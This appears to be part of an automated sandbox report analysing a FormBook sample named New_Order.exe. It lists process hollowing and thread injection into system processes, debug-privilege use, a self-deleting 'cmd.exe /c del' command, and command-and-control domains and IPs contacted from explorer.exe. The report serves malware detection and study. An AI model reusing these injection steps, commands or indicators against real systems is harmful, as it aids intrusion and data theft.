Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h] 1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EE539 mov eax, dword ptr fs:[00000030h] 1_2_039EE539
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8D34 mov eax, dword ptr fs:[00000030h] 1_2_039F8D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039AA537 mov eax, dword ptr fs:[00000030h] 1_2_039AA537
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h] 1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h] 1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h] 1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03947D50 mov eax, dword ptr fs:[00000030h] 1_2_03947D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03963D43 mov eax, dword ptr fs:[00000030h] 1_2_03963D43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A3540 mov eax, dword ptr fs:[00000030h] 1_2_039A3540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D3D40 mov eax, dword ptr fs:[00000030h] 1_2_039D3D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h] 1_2_0394C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h] 1_2_0394C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393849B mov eax, dword ptr fs:[00000030h] 1_2_0393849B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8CD6 mov eax, dword ptr fs:[00000030h] 1_2_039F8CD6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E14FB mov eax, dword ptr fs:[00000030h] 1_2_039E14FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h] 1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h] 1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h] 1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h] 1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h] 1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h] 1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h] 1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h] 1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h] 1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h] 1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h] 1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395BC2C mov eax, dword ptr fs:[00000030h] 1_2_0395BC2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h] 1_2_039BC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h] 1_2_039BC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A44B mov eax, dword ptr fs:[00000030h] 1_2_0395A44B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394746D mov eax, dword ptr fs:[00000030h] 1_2_0394746D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04869080 mov eax, dword ptr fs:[00000030h] 7_2_04869080
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h] 7_2_048E3884
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h] 7_2_048E3884
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487849B mov eax, dword ptr fs:[00000030h] 7_2_0487849B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A90AF mov eax, dword ptr fs:[00000030h] 7_2_048A90AF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h] 7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h] 7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04938CD6 mov eax, dword ptr fs:[00000030h] 7_2_04938CD6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h] 7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h] 7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_049214FB mov eax, dword ptr fs:[00000030h] 7_2_049214FB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048658EC mov eax, dword ptr fs:[00000030h] 7_2_048658EC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h] 7_2_048E6CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h] 7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04934015 mov eax, dword ptr fs:[00000030h] 7_2_04934015
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h] 7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h] 7_2_048E7016
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h] 7_2_0493740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h] 7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489BC2C mov eax, dword ptr fs:[00000030h] 7_2_0489BC2C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h] 7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489A44B mov eax, dword ptr fs:[00000030h] 7_2_0489A44B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04880050 mov eax, dword ptr fs:[00000030h] 7_2_04880050
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h] 7_2_048FC450
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04922073 mov eax, dword ptr fs:[00000030h] 7_2_04922073
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0488746D mov eax, dword ptr fs:[00000030h] 7_2_0488746D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04931074 mov eax, dword ptr fs:[00000030h] 7_2_04931074
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h] 7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0488C182 mov eax, dword ptr fs:[00000030h] 7_2_0488C182
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489A185 mov eax, dword ptr fs:[00000030h] 7_2_0489A185
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h] 7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h] 7_2_0489FD9B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04892990 mov eax, dword ptr fs:[00000030h] 7_2_04892990
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048935A1 mov eax, dword ptr fs:[00000030h] 7_2_048935A1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E69A6 mov eax, dword ptr fs:[00000030h] 7_2_048E69A6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h] 7_2_048961A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h] 7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h] 7_2_04891DB5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_049305AC mov eax, dword ptr fs:[00000030h] 7_2_049305AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h] 7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E6DC9 mov ecx, dword ptr fs:[00000030h] 7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04918DF1 mov eax, dword ptr fs:[00000030h] 7_2_04918DF1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0486B1E1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048F41E8 mov eax, dword ptr fs:[00000030h] 7_2_048F41E8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h] 7_2_04869100
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04938D34 mov eax, dword ptr fs:[00000030h] 7_2_04938D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h] 7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04884120 mov ecx, dword ptr fs:[00000030h] 7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h] 7_2_04894D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489513A mov eax, dword ptr fs:[00000030h] 7_2_0489513A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h] 7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486AD30 mov eax, dword ptr fs:[00000030h] 7_2_0486AD30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048EA537 mov eax, dword ptr fs:[00000030h] 7_2_048EA537
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A3D43 mov eax, dword ptr fs:[00000030h] 7_2_048A3D43
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h] 7_2_0488B944
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E3540 mov eax, dword ptr fs:[00000030h] 7_2_048E3540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04887D50 mov eax, dword ptr fs:[00000030h] 7_2_04887D50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486C962 mov eax, dword ptr fs:[00000030h] 7_2_0486C962
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h] 7_2_0486B171
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h] 7_2_0488C577
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048FFE87 mov eax, dword ptr fs:[00000030h] 7_2_048FFE87
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h] 7_2_0489D294
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h] 7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048E46A7 mov eax, dword ptr fs:[00000030h] 7_2_048E46A7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h] 7_2_04930EA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0487AAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0489FAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04892ACB mov eax, dword ptr fs:[00000030h] 7_2_04892ACB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04938ED6 mov eax, dword ptr fs:[00000030h] 7_2_04938ED6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048936CC mov eax, dword ptr fs:[00000030h] 7_2_048936CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A8EC7 mov eax, dword ptr fs:[00000030h] 7_2_048A8EC7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0491FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0491FEC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048776E2 mov eax, dword ptr fs:[00000030h] 7_2_048776E2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048916E0 mov ecx, dword ptr fs:[00000030h] 7_2_048916E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04892AE4 mov eax, dword ptr fs:[00000030h] 7_2_04892AE4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h] 7_2_0486C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04898E00 mov eax, dword ptr fs:[00000030h] 7_2_04898E00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04878A0A mov eax, dword ptr fs:[00000030h] 7_2_04878A0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h] 7_2_0486AA16
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04883A1C mov eax, dword ptr fs:[00000030h] 7_2_04883A1C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h] 7_2_0489A61C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h] 7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04865210 mov ecx, dword ptr fs:[00000030h] 7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04921608 mov eax, dword ptr fs:[00000030h] 7_2_04921608
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0486E620 mov eax, dword ptr fs:[00000030h] 7_2_0486E620
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h] 7_2_048A4A2C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0491FE3F mov eax, dword ptr fs:[00000030h] 7_2_0491FE3F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h] 7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h] 7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048F4257 mov eax, dword ptr fs:[00000030h] 7_2_048F4257
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0487766D mov eax, dword ptr fs:[00000030h] 7_2_0487766D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A927A mov eax, dword ptr fs:[00000030h] 7_2_048A927A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h] 7_2_0491B260
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04938A62 mov eax, dword ptr fs:[00000030h] 7_2_04938A62
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h] 7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h] 7_2_04871B8F
Enables debug privileges
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.charmboutiques.com
Source: C:\Windows\explorer.exe Domain query: www.shanghainternational.com
Source: C:\Windows\explorer.exe Network Connect: 91.148.168.141 80
Source: C:\Windows\explorer.exe Domain query: www.voiceclubdubai.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Domain query: www.websitemax.co.uk
Source: C:\Windows\explorer.exe Network Connect: 8.210.40.49 80
Source: C:\Windows\explorer.exe Network Connect: 150.95.255.38 80
Source: C:\Windows\explorer.exe Domain query: www.roastedorganic.com
Source: C:\Windows\explorer.exe Domain query: www.year-action.xyz
Source: C:\Windows\explorer.exe Domain query: www.susanestuart.com
Source: C:\Windows\explorer.exe Network Connect: 75.2.115.196 80
Source: C:\Windows\explorer.exe Network Connect: 62.149.189.71 80
Source: C:\Windows\explorer.exe Domain query: www.w-c727or.net
Source: C:\Windows\explorer.exe Domain query: www.kantan-sedori.com
Source: C:\Windows\explorer.exe Domain query: www.geacasolaro.com
Source: C:\Windows\explorer.exe Domain query: www.hdjakdhf.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 85.233.160.22 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\New_Order.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\svchost.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\svchost.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1260000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\New_Order.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\New_Order.exe Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
Source: explorer.exe, 00000002.00000000.253797902.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000002.495816911.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph

Behavior Graph ID: 411746
Sample: New_Order.exe
Startdate: 12/05/2021
Architecture: WINDOWS
Score: 100

Start (node 2)
  DNS/IP: www.thelordnelsonwinthorpe.com
  DNS/IP: www.algaeflipflops.com
  Signature: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Signature: Found malware configuration
  Signature: Malicious sample detected (through community Yara rule)
  Signature: 8 other signatures
  started -> New_Order.exe 18 (node 11)

New_Order.exe 18 (node 11)
  Created File: C:\Users\user\AppData\...\a9g5j8lkcs3.dll, PE32 (dropped)
  Signature: Writes to foreign memory regions
  Signature: Maps a DLL or memory area into another process
  started -> svchost.exe (node 15)

svchost.exe (node 15)
  Signature: Modifies the context of a thread in another process (thread injection)
  Signature: Maps a DLL or memory area into another process
  Signature: Sample uses process hollowing technique
  Signature: 2 other signatures
  injected -> explorer.exe 6 (node 18)

explorer.exe 6 (node 18)
  DNS/IP: voiceclubdubai.com 91.148.168.141, ports 49717 -> 80, TELEPOINTBG, Bulgaria
  DNS/IP: fwd3.hosts.co.uk 85.233.160.22, ports 49720 -> 80, ISIONUKNamescoLimitedGB, United Kingdom
  DNS/IP: 15 other IPs or domains
  Signature: System process connects to network (likely due to code injection or exploit)
  Signature: Performs DNS queries to domains with low reputation
  started -> wscript.exe (node 22)

wscript.exe (node 22)
  Signature: Modifies the context of a thread in another process (thread injection)
  Signature: Maps a DLL or memory area into another process
  Signature: Tries to detect virtualization through RDTSC time measurements
  started -> cmd.exe 1 (node 25)

cmd.exe 1 (node 25)
  started -> conhost.exe (node 27)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
75.2.115.196 | www.roastedorganic.com | United States | 16509 | AMAZON-02US | true
62.149.189.71 | www.geacasolaro.com | Italy | 31034 | ARUBA-ASNIT | true
91.148.168.141 | voiceclubdubai.com | Bulgaria | 31083 | TELEPOINTBG | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
